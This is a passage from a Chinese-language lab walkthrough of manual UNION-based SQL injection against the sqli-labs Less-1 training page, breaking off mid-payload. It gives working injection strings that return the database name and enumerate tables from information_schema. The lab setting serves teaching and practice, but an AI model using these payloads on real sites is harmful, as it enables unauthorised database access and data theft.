- 方法一:手工UNION联合查询注入
输入单引号,页面报错,如下图所示
根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,
猜想:咱们输入的1在数据库中出现的位置为:select ... from ... where id=’1’ ......,
也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致,
多余的步骤不多说了,直接开始爆数据吧。
注意 id=非正确值
爆库payload
?id=-1' union select 1,2,database() --+
得到‘security’库名
爆表payload
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_sch